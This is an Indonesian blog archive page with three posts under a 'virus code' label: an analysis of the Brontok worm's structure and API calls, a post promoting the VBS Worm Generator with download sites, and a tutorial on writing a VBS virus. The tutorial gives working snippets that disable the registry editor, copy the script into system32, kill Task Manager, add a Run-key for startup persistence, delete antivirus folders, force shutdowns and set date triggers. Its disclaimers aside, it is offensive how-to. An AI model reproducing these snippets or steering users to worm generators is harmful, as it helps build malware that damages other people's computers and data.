readbud - get paid to read and rate articles
Tampilkan postingan dengan label virus code. Tampilkan semua postingan
Tampilkan postingan dengan label virus code. Tampilkan semua postingan

Minggu, 20 Desember 2009

Source Code Virus Brontok

Dalam belakangan waktu ini mungkin anda pernah mendengar nama virus Brontok?......ya betul virus yang
menduplikatkan dirinya dan menyesuaikan nama virus barunya berdasarkan folder atau file pada window
epxlorer yang aktif. Ciri khas dari virus ini adalah menggunakan Icon folder, sehingga dapat mengecoh
seseorang yang melihatnya.

Mengapa membahas virus ini?,...hmm...m....sebetulnya saya tidak terlalu tertarik membahas ini, tau nggak apa
yang menyebabkan saya tertarik membahasnya?...pasti nggak tau kan .....ini disebabkan beberapa hari lalu
banyak kehebohan mengenai virus brontok dan sempat menginfeksi beberapa komputer teman2ku .

Ok untuk mempersingkat waktu kita langsung aja

Setelah dilihat struktur file dari virus tersebut ternyata pembuatan virusnya menggunakan visual basic 6.0
ops....ternyata made in vb coy....nah ini yang membuat tambah menarik.

Virus ini terdiri dari 1 form da 1 Module, dengan nama

Form -> BrontokForm

Module -> API

Dengan detail berikut:

Begin VB.Form BrontokForm

Caption = \"Brontok.A\"

ForeColor = &H8000000F&

ScaleMode = 1

BeginProperty Font

Name = \"\"

Size = 195323.4944

Charset = 29

Weight = 774

EndProperty

Begin VB.Timer TmrBrontok

Enabled = 0 \'False

Interval = 2000

Left = 2160

Top = 0

Width = 57352

Height = 1

End

End

Dengan nama Project: Brontok.vbp, yang disimpan pada directory:

F:\\VPROJECT\\REHAB\\Re-1\\BRONTOK.A

Jelas sekali bahwa virus ini dibuat oleh sorang program lokal, yang mempunyai skill Menengah Keatas.

Ada beberapa procedure & function yang digunakan dengan nama:

Form_QueryUnload(Cancel As Integer, UnloadMode As Integer)
TmrBrontok_Timer()

Subr_004()

CekKoneksiInternet()

ManipulasiExec()

Subr_007()

KeluarDong()

BronReg()

CopyAppData()

DownloadVir()

StartDong()

StartUp()

DecTeks()

MutMutex()

MutCr()

DownloadFile()

CekUpdate()

InfekNetwork()

Judul()

CekRemDisk()

BikinFile()

GetEmailFile()

CekValidMail()

GetTeks()

CekKar()

ListMail()

GetTargetMBhs()

GavMailer()

BrontokMail()

Subr_031()

DataEmail()

DownMIME()

FindFilesAPI()

ListFileGav()

InfekFile()

SmallAttack()

MinggirLoe()

GetHostByNameAlias()

StripNulls()

BikinKredit()

Dan beberapa fungsi Api yang digunakan anatara lain:

Fungsi Baca Tulis Ke Register:

Declare Function RegOpenKeyExA Lib \"advapi32.dll\" ()

Declare Function RegSetValueExA Lib \"advapi32.dll\" ()

Declare Function RegCloseKey Lib \"advapi32.dll\" ()

Declare Function RegCreateKeyExA Lib \"advapi32.dll\" ()

Declare Function Sleep Lib \"kernel32\" ()

Mendapatkan Spesial Folder:

Declare Function SHGetPathFromIDList Lib \"shell32.dll\" ()

Declare Function SHGetSpecialFolderLocation Lib \"shell32.dll\" ()

Membaca Isi Halaman Situs:

Declare Function InternetOpenA Lib \"wininet.dll\" ()
Declare Function InternetOpenUrlA Lib \"wininet.dll\" ()

Declare Function InternetReadFile Lib \"wininet.dll\" ()

Declare Function InternetCloseHandle Lib \"wininet.dll\" ()

Mendapatkan Caption Dari Sebuah Window:

Declare Function GetWindowTextA Lib \"user32\" ()

Declare Function GetWindowTextLengthA Lib \"user32\" ()

Dapatkan HWND Window aktif:

Declare Function GetForegroundWindow Lib \"user32\" ()

Shutdown, Reboot, LogOff Windows:

Declare Function ExitWindowsEx Lib \"user32\" ()

Declare Function GetCurrentProcess Lib \"kernel32\" ()

Declare Function OpenProcessToken Lib \"advapi32\" ()

Declare Function LookupPrivilegeValueA Lib \"advapi32\" ()

Declare Function AdjustTokenPrivileges Lib \"advapi32\" ()

Mendapatkan Jenis Media yang ada spt Removable Disk, CD-Rom dll:

Declare Function GetDriveTypeA Lib \"kernel32\" ()

Declare Function ShellExecuteA Lib \"shell32.dll\" ()

Declare Function RtlMoveMemory Lib \"kernel32\" ()

Winsock API:

Declare Function closesocket Lib \"wsock32.dll\" ()

Declare Function connect Lib \"wsock32.dll\" ()

Declare Function htons Lib \"wsock32.dll\" ()

Declare Function inet_addr Lib \"wsock32.dll\" ()

Declare Function recv Lib \"wsock32.dll\" ()

Declare Function send Lib \"wsock32.dll\" ()

Declare Function socket Lib \"wsock32.dll\" ()

Declare Function gethostbyname Lib \"wsock32.dll\" ()

Declare Function WSAStartup Lib \"wsock32.dll\" ()

Declare Function WSACleanup Lib \"wsock32.dll\" ()

Declare Function WSAAsyncSelect Lib \"wsock32.dll\" ()

Fungsi yang berhubungan dengan file:

Declare Function FindFirstFileA Lib \"kernel32\" ()

Declare Function FindNextFileA Lib \"kernel32\" ()

Declare Function GetFileAttributesA Lib \"kernel32\" ()

Declare Function FindClose Lib \"kernel32\" ()

dll...

Terlihat jelas pada fungsi-fungsi api yang digunakan bahwa penularan virus ini brontok menggunakan
beberapa cara. seperti pengiriman lewat email, pencarian nama komputer yang terhubung kejaringan dengan
menyalin dirinya pada folder yang di sharing dan menyalin dirinya pada window explorer yang aktif. kalo gak
salah si pembuat virus mempunyai SMTP sendiri (wah ati-ati mas ntar ketangkep)

Jika dilihat kembali pada strukturnya ada beberapa kata yang di encrypt, kemungkinan berupa exploit code
atau apalah namanya. hanya allah dan pembuat virus yang tau.

Virus ini mempunyai fungsi ExitWindowsEx yang diimport dari file user32.dll, fungsi ini biasanya digunakan
untuk mematikan windows.

kayaknya sipembuat virus membuat triger yang berisi perintah mematikan/merestart komputer.
Selain itu dalam struktur filenya terdapat kata-kata seperti ini:

FOLDER.HTT

RORO

.HTT

.DOC

.CSV

.EML

.CFM

.PHP

.WAB

.EML

.TXT

.HTML

.HTM

MY DATA SOURCES

MY EBOOKS

MY MUSIC

MY SHAPES

MY VIDEOS

MY DOCUMENT

Dan ada beberapa alamat situs yang diserang, apa DDOS ya...hik..hik..tau deh. Selain itu pembuat virus
mencantumkan nama: --JowoBot#VM Community --

Selanjutnya coba lihat tiga fungsi api berikut:

Declare Function GetWindowTextA Lib \"user32\" ()

Declare Function GetWindowTextLengthA Lib \"user32\" ()

Declare Function GetForegroundWindow Lib \"user32\" ()

Sepertinya pembuat virus memanfaatkan windowexplorer untuk memperbanyak filenya ke folder yang lain.
Dengan cara membaca Caption yang terdapat pada windows aktif yang berisi nama directory/path. Dengan
menggunakan 2 fungsi diatas (GetWindowTextA & GetWindowTextLengthA), Sedangkan fungsi
GetForegroundWindow digunakan untuk mendapatkan Handle Window (HWND) yang sedang aktif.

Jadi kesimpulannya virus ini tidak dapat menyalin dirinya kalo Caption pada windowExplorer bukan berupa
Directory/Path. Sehinga si pembuat virus menonaktifkan setting pada Folder Options.

Kemudian yang lebih unik lagi virus ini membaca isi halaman situs yang terbuka pada sebuah InternetExplorer
dengan menggunakan fungsi:

Declare Function InternetOpenA Lib \"wininet.dll\" ()

Declare Function InternetOpenUrlA Lib \"wininet.dll\" ()

Declare Function InternetReadFile Lib \"wininet.dll\" ()

Declare Function InternetCloseHandle Lib \"wininet.dll\" ()

Kalo saya tebak, sepertinya pembuat virus mencari alamat email pada halaman situs yang terbuka dan
mengirimkan virus nya berdasarkan alamat email yang ditemukan pada halaman tersebut dengan kata kunci
seperti mailto: ataupun @xxxx.com dll...

....Untuk membersihkannya silahkan baca selengkapnya di situs AntiVirus yang lain...he..he...maaf saya hanya
membahas yang ini saja.

Tapi kalo pengen menonaktifkan virus ini secara cepat, coba masuk safemode kemudian rename file
MSVBVM60.dll menjadi MSVBVM60.dl_

karena virus ini membutuhkan runtime vb. Nah kalo udah gak aktif baru kita bisa hapus beberapa registry entrydan file-file virus brontoknya.

Sayang sekali virus ini tidak menggunakan program compressor, sehingga memudahkan orang untuk
mengenalinya.

Semoga bermanfaat....
Diposting oleh di Tidak ada komentar:
Label:

Selasa, 15 Desember 2009

Cara Gampang Bikin Virus
Oleh : Alzamora

Kamu pasti masih inget dengan virus worm yang sempat menghebohkan Tampilan awal program Vbs WGinternet beberapa waktu yang lalu : Anna Kournikova. Worm yang menginfeksi Windows beserta Outlook Exressnya, akan mengirim sendiri pesan virus ke seluruh email yang terdapat pada address book.
Sebenarnya untuk membuat worm semacam itu kamu tidak harus menjadi seorang programmer handal. Cukup bisa njalanin komputer dan punya softwarenya. Lalu apa softwarenya ? VBS Worm Generator !! Dengan program yang dibuat oleh hacker Argentina berusia 18 tahun itu kamu dapat membuat virus yang sama dahsyatnya dengan Anna Kournikova, cukup dengan melakukan beberapa klik.
Program VBSWG memungkinkan kamu untuk membuat worm dengan nama sesukamu. Kamu juga bisa memilih efek dari worm tersebut, seperti misalnya menampilkan pesan atau memaksa seseorang untuk menuju situs tertentu. Akibat yang paling parah tentunya jika worm tersebut kamu setting supaya membikin crash komputer.
Kemampuan lain dari VBSWG adalah melakukan enkripsi terhadap source code worm yang dibuat. Kemampuan lainnya bisa kamu coba sendiri :-) Pokoknya cukup hebatlah program ini.
Tapi seperti yang dikatakan oleh pembuatnya, VBS Worm Generator hanya boleh digunakan untuk belajar, bukan untuk merugikan orang lain. Untuk itu jika Anda memang berniat mencobanya, ingat-ingat peringatan tersebut.

Situs yg menyediakan VBSWG :
http://www.virii.com.ar,
http://www.kvirii.com.ar,
http://vx.netlux.org/dat/tv07.shtml.
Atau gunakan search engine http://www.google.com dan masukkan keyword vbswg2bfix.zip, Vbswg2B.zip, worm generator, dan keyword semacamnya

diambil dari http://www.klik-kanan.com/fokus/vbswm.shtml

Diposting oleh di Tidak ada komentar:
Label:

Cara mudah bikin virus

Cara mudah bikin virus "versi 1"

Sebelumnya, berikut ini cara-cara paling gampang untuk membuat virus.
semua hal dibawah ini hanya sebagai penambah pengetahuan kita saja
dan tidak boleh disalah gunakan untuk hal-hal yang bersifat merusak.
Dan "Saya tidak bertanggung jawab jika terjadi hal-hal yg tdak diinginkan dg adanya postingan Saya Ini. Sekarang kita akan
membahas cara gampang membuat virus pake vbs file.

pertama, berikut ini hal-hal yang wajib kita siapin sebelum membuat virus adalah...


# seperangkat komputer berikut monitor, cpu, kibor, mouse, cat, rabbit, pig, eh..kq mlah jd kyak bonbin yaw?He.. (wajib)
# kita harus menyiapkan sebuah file yang ber-ekstensi vbs (*.vbs)
# secangkir teh anget. Tp klo blm buka puasa yaw jgn disiapin. OK...
# akan lebih afdoL kalo ditemenin lagu2nya scorpions n GnR (Q ngepans bngt t ma 2 band it)

Untuk eksekusi pertama, yang dilakukan virus biasanya mengubah registry.
Misalnya:

1. mendisable regedit. Yang kita tulis:
On Error Resume Next(perintah ini digunakan pada file vb
supaya kalo ada yang salah bisa dilanjutin kode selanjutnya)
CreateObject("WScript.Shell").run "cmd.exe /c reg add hkcusoftware\microsoft\windows\currentversion\policies\system /v
disableregistrytools /t reg_dword /d ""1"" /f", vbhide

sebenarnya banyak cara untuk mendisable regedit. misalnya kek gini:
CreateObject("WScript.Shell").regwriteHKEY_CURRENT_USERsoftware\microsoft\windows\currentversion\policies\systemdisableregistrytools", 1, "REG_DWORD"

2. mengopikan diri ke direktory lain

CreateObject("Scripting.FileSystemObject").
GetFile(WScript.ScriptFullName).Copy "c:\windows\system32\virus.vbs"
Ada juga cara lain dengan kode seperti ini:
On Error Resume Next
createobject("scripting.filesystemobject").copyfile wscript.scriptfullname,
createobject("scripting.filesystemobject")
.getspecialfolder(1) & "\virus.vbs"
misalnya untuk mengkopikan diri ke direktory C:\WINDOWS\System32
dengan nama virus.vbs
.getspecialfolder(0) digunakan untuk direktory WINDOWS
.getspecialfolder(1) digunakan untuk direktory SYSTEM32 pada windowsXP
.getspecialfolder(2) digunakan untuk direktory Temporary

3.Membunuh proses.
digunakan untuk membunuh proses
(proses adalah program yang sedang berjalan)
misalnya kita akan membunuh proses taskmanager
On Error Resume Next
CreateObject("WScript.Shell")
.run "taskkill /f /im taskmgr.exe", vbhide

4.Menjalankan virus pada saat startup atau saat windows dihidupkan.
menggunakan regedit
On Error Resume Next
CreateObject("WScript.Shell").RegWrite "HKEY_LOCAL_MACHINESoftware\Microsoft\Windows\CurrentVersion\Run\virus"
, "c:\windows\system32\virus.vbs"
(menjalankan virus yang berada di direktory c:\windows\system32
dengan nama virus.vbs)

5.Menghapus File / Folder
agar virus yang kita buat tidak banyak menggunakan script bisa di singkat seperti ini:
On Error Resume Next
set hapus = CreateObject("Scripting.FileSystemObject")
hapus.DeleteFile "C:\xxx.exe" '(menghapus file xxx.exe di direktory C:\)
hapus.DeleteFolder "C:\antivirus" '(menghapus folder antivirus di direktory C:\)

6.Merestart Windows
CreateObject("WScript.Shell").run "shutdown -r -f -t 60", vbhide
merestart windows dalam waktu 60 detik

7.Meng-ShutDown Windows
CreateObject("WScript.Shell").run "shutdown -s-f -t 60", vbhide
mematikan windows dalam waktu 60 detik :)yang beda cuman
"shutdown -s-f -t 60"
S = untuk shutdown dan
R = untuk reboot\restart

8. Mengaktifkan Virus Pada Waktu tertentu
If day(now) = 1 and month(now) = 1 and year(now) = 2009 then
'(masukkan kode virus disini)
End if
'misalnya kalo mau mengaktifkan pada tanggal 1, bulan 1
'dan tahun 2009

Ok. Pelajaran bikin virus untuk hari ini saya kira udah cukup.
Dan semoga bermanfaat :-)

Tapi ingat tulisan ini hanya utk skedar pngetahuan saja, dan jgn disalahgunakan.
Diposting oleh di Tidak ada komentar:
Label:
Langganan: Komentar (Atom)

Web hosting